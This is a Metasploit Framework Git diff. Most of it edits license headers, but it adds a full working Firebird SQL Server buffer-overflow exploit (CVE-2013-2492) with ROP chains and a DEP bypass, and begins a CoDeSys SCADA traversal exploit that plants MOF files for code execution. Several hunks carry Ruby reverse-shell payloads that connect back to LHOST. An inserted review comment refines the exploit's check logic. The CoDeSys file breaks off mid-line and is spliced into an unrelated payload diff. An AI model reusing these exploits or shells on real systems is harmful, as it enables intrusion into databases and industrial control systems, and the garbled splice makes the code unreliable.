a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index ef6906721e..0920ef652d 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb 
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 105bc4dca4..cc437a1280 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb index a1e822774c..f413dc0312 100644 --- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb +++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 52b05457f3..66f9e24372 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb 
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb
index 2f19c28d1f..66799d51fe 100644
--- a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb
+++ b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
index 443b575891..4599847eae 100644
--- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
+++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb
index 1e678f874d..4cc05527a1 100644
--- a/modules/exploits/windows/http/sysax_create_folder.rb
+++ b/modules/exploits/windows/http/sysax_create_folder.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
-# http://metasploit.com/
+# http://metasploit.com/
 ##

 require 'msf/core'
diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index 1fcbdd7574..1b231519e3 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
index 62717522be..b56b032c19 100644
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb
index 8ebed8a823..a1397edd51 100644
--- a/modules/exploits/windows/local/current_user_psexec.rb
+++ b/modules/exploits/windows/local/current_user_psexec.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb
new file mode 100644
index 0000000000..3763fa6058
--- /dev/null
+++ b/modules/exploits/windows/misc/fb_cnct_group.rb
@@ -0,0 +1,241 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + + def initialize + super( + 'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in Firebird SQL Server. A specially + crafted packet can be sent which will overwrite a pointer allowing the attacker to + control where data is read from. Shortly, following the controlled read, the + pointer is called resulting in code execution. + + The vulnerability exists with a group number extracted from the CNCT information, + which is sent by the client, and whose size is not properly checked. + + This module uses an existing call to memcpy, just prior to the vulnerable code, + which allows a small amount of data to be written to the stack. A two-phases + stackpivot allows to execute the ROP chain which ultimately is used to execute + VirtualAlloc and bypass DEP. 
+ }, + 'Author' => 'Spencer McIntyre', + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2013-2492' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh' + }, + 'Payload' => + { + # Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax] + 'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20", + 'Space' => 400, + 'BadChars' => "\x00\x0a\x0d" + }, + 'Targets' => + [ + # pivots are pointers to stack pivots + [ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ], + [ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ], + [ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ], + [ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ] + ], + 'DefaultTarget' => 0, + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2013' + ) + + register_options([Opt::RPORT(3050)], self.class) + end + + def check + begin + connect + rescue + return Exploit::CheckCode::Safe + end + + filename = "C:\\#{rand_text_alpha(12)}.fdb" + username = rand_text_alpha(7) + + check_data = "" + check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24" + check_data << "\x00\x00\x00\x13" + check_data << filename + check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24" + check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c" + check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e" + check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02" + check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01" + check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b" + check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06" + check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05" + check_data << 
"\x00\x00\x00\x08" + + sock.put(check_data) + data = sock.recv(16) + disconnect + + opcode = data.unpack("N*")[0] + version = data.unpack("N*")[1] + if opcode == 3 # Accept + if [ 0xffff800b, 0xffff800c ].include?(version) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Unknown + end + + def stack_pivot_rop_chain + case target.name + when 'Windows FB 2.5.2.26539' + rop_chain = [ + 0x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe] + 0x0059ffeb, # POP EBP # RETN [fbserver.exe] + 0x0000153c, # 0x0000153c-> ebp + 0x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe] + 0x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.5.1.26351' + rop_chain = [ + 0x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe] + 0x0059650b, # POP EBP # RETN [fbserver.exe] + 0x0000153c, # 0x0000153c-> ebp + 0x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe] + 0x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.1.5.18496' + rop_chain = [ + 0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe] + 0x4a86ee77, # POP ECX # RETN [icuuc30.dll] + 0x000001c0, # 0x000001c0-> ebp + 0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe] + 0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll] + ].pack("V*") + when 'Debug' + rop_chain = [ ].fill(0x41414141, 0..5).pack("V*") + end + return rop_chain + end + + def final_rop_chain + # all rop chains in here created with mona.py, thanks corelan! 
+ case target.name + when 'Windows FB 2.5.2.26539' + rop_chain = [ + 0x4a831344, # POP ECX # RETN [icuuc30.dll] + 0x0065f16c, # ptr to &VirtualAlloc() [IAT fbserver.exe] + 0x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe] + 0x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe] + 0x00431905, # POP EBP # RETN [fbserver.exe] + 0x00401932, # & push esp # ret [fbserver.exe] + 0x4a844ac0, # POP EBX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> ebx + 0x4a85bfee, # POP EDX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> edx + 0x005dae9e, # POP ECX # RETN [fbserver.exe] + 0x00000040, # 0x00000040-> ecx + 0x0057a822, # POP EDI # RETN [fbserver.exe] + 0x005b0384, # RETN (ROP NOP) [fbserver.exe] + 0x0046f8c3, # POP EAX # RETN [fbserver.exe] + 0x90909090, # nop + 0x00586002, # PUSHAD # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.5.1.26351' + rop_chain = [ + 0x00656472, # POP ECX # RETN [fbserver.exe] + 0x0065b16c, # ptr to &VirtualAlloc() [IAT fbserver.exe] + 0x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe] + 0x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe] + 0x0041d1ae, # POP EBP # RETN [fbserver.exe] + 0x0040917f, # & call esp [fbserver.exe] + 0x4a8589c0, # POP EBX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> ebx + 0x4a864cc3, # POP EDX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> edx + 0x0064ef59, # POP ECX # RETN [fbserver.exe] + 0x00000040, # 0x00000040-> ecx + 0x005979fa, # POP EDI # RETN [fbserver.exe] + 0x00424a50, # RETN (ROP NOP) [fbserver.exe] + 0x4a86052d, # POP EAX # RETN [icuuc30.dll] + 0x90909090, # nop + 0x005835f2, # PUSHAD # RETN [fbserver.exe] + ].pack("V*") + when 'Windows FB 2.1.5.18496' + rop_chain = [ + 0x005763d5, # POP EAX # RETN [fbserver.exe] + 0x005ce120, # ptr to &VirtualAlloc() [IAT fbserver.exe] + 0x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe] + 0x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe] + 0x004e695a, # POP EBP # RETN [fbserver.exe] + 0x004d9e6d, # & jmp esp [fbserver.exe] + 
0x4a828650, # POP EBX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> ebx + 0x4a85bfee, # POP EDX # RETN [icuuc30.dll] + 0x00001000, # 0x00001000-> edx + 0x00590328, # POP ECX # RETN [fbserver.exe] + 0x00000040, # 0x00000040-> ecx + 0x4a8573a1, # POP EDI # RETN [icuuc30.dll] + 0x0042ba8c, # RETN (ROP NOP) [fbserver.exe] + 0x00577605, # POP EAX # RETN [fbserver.exe] + 0x90909090, # nop + 0x004530ce, # PUSHAD # RETN [fbserver.exe] + ].flatten.pack("V*") + when 'Debug' + rop_chain = [ ].fill(0x41414141, 0..17).pack("V*") + end + return rop_chain + end + + def exploit + connect + + rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*") + + # this data gets written to the stack via memcpy, no more than 32 bytes can be written + overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot + overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8] + overwrite_and_rop_chain << stack_pivot_rop_chain + + filename = "C:\\#{rand_text_alpha(13)}.fdb" + evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24" + evil_data << "\x00\x00\x00\x14" + evil_data << filename + evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24" + evil_data << "\x05\x20" + evil_data << overwrite_and_rop_chain + evil_data << "\x15\x6c\x6f\x63\x61\x6c" + evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e" + evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02" + evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01" + evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b" + evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06" + evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05" + evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41" + evil_data << rop_nop_sled + evil_data << final_rop_chain + evil_data << payload.encoded + + 
print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}") + sock.put(evil_data) + + disconnect + end + +end diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index d409f9e417..dc5c198662 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Exploit::Remote diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index 0ae8257604..7e2d7ff6bb 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb new file mode 100644 index 0000000000..999995d8b9 --- /dev/null +++ b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb 
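Review bot: In `check` of fb_cnct_group.rb the reply from `sock.recv(16)` is unpacked without a nil test, so a peer that accepts the connection and then closes it would presumably raise NoMethodError out of `check` instead of yielding a check code; add `return Exploit::CheckCode::Unknown if data.nil? || data.length < 8` before the two `unpack` calls. The method also reports `Exploit::CheckCode::Vulnerable` whenever the accepted value is 0xffff800b or 0xffff800c, which looks like a negotiated protocol version rather than a server build, so a patched server would likely match too; `Exploit::CheckCode::Appears` fits what is actually measured, with a comment naming the two constants. `disconnect` is skipped when `sock.put` or `sock.recv` raises and belongs in an `ensure`, and the bare `rescue` around `connect` maps every StandardError to `Safe`, where `Unknown` would be the more accurate answer for an unreachable host.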
@@ -0,0 +1,104 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::WbemExec + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SCADA 3S CoDeSys Gateway Server Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability that allows arbitrary + file creation, which can be used to execute a mof file in order to gain remote + execution within the SCADA system. + }, + 'Author' => + [ + 'Enrique Sanchez ' + ], + 'License' => 'MSF_LICENSE', + 'References' => + [ + ['CVE', '2012-4705'], + ['URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf'] + ], + 'DisclosureDate' => 'Feb 02 2013', + 'Platform' => 'win', + 'Targets' => + [ + ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }] + ], + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(1211), + ], self.class) + end + + ## + # upload_file(remote_filepath, remote_filename, local_filedata) + # + # remote_filepath: Remote filepath where the file will be uploaded + # remote_filename: Remote name of the file to be executed ie. boot.ini + # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() + def upload_file(remote_filepath, remote_filename, local_filedata = null) + magic_code = "\xdd\xdd" + opcode = [6].pack('L') + + # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\ 'Unix Command Shell, Reverse TCP SSL (telnet)', - 'Version' => '$Revision$', 'Description' => %q{ Creates an interactive shell via mknod and telnet. 
This method works on Debian and other systems compiled - without /dev/tcp support. This module uses the '-z' + without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL. }, 'Author' => 'RageLtMan', diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb index 96724f20e7..3e2981670b 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP SSL (via perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl, uses SSL', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index 9892515e26..201a01ed7f 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP SSL (via php)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via php, uses SSL', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_python.rb b/modules/payloads/singles/cmd/unix/reverse_python.rb index ed59723041..55a7223440 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python.rb 
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
index a7e232d24b..8afe25f47d 100644
--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -22,7 +18,6 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)',
- 'Version' => '$Revision$',
 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
 'Author' => 'RageLtMan',
 'License' => BSD_LICENSE,
diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
index 6743def9e9..3b728e7b1f 100644
--- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -22,7 +18,6 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP SSL (via Ruby)',
- 'Version' => '$Revision$',
 'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
 'Author' => 'RageLtMan',
 'License' => MSF_LICENSE,
@@ -44,6 +39,9 @@ module Metasploit3 def command_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'" + res = "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new" + res << "(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while" + res << "(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'" + return res end end diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index 593e69d716..5f97578b10 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,8 +17,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, - 'Name' => 'Unix Command Shell, Double reverse TCP SSL (telnet)', - 'Version' => '$Revision$', + 'Name' => 'Unix Command Shell, Double Reverse TCP SSL (telnet)', 'Description' => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option', 'Author' => [ 'hdm', # Original module diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb index 39aecc0b09..324d36b949 100644 --- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb 
@@ -1,3 +1,10 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
index ca70b10879..67bfafe883 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -22,7 +18,6 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)',
- 'Version' => '$Revision$',
 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
 'Author' => 'RageLtMan',
 'License' => BSD_LICENSE,
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
index 82f61c768d..0b61f6a96f 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -24,7 +20,6 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Ruby Command Shell, Reverse TCP SSL',
- 'Version' => '$Revision$',
 'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
 'Author' => 'RageLtMan',
 'License' => MSF_LICENSE,
@@ -46,7 +41,8 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end" + rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\"," + rbs << "\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end" return rbs end end diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index 05f23f3ae8..1f20d431be 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex' require 'msf/core/post/windows/priv' diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index fb7e1d8f5d..1e461f4742 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # List physical drives and logical volumes on the remote system # diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index df2c8f769a..827d0c3a09 100644 --- a/modules/post/windows/gather/forensics/imager.rb 
+++ b/modules/post/windows/gather/forensics/imager.rb
@@ -1,3 +1,10 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
 #
 # Forensic byte-for-byte imaging of remote disks and volumes
 #
diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb
index 4e85c89abe..605ae4814b 100644
--- a/modules/post/windows/gather/forensics/nbd_server.rb
+++ b/modules/post/windows/gather/forensics/nbd_server.rb
@@ -1,3 +1,10 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
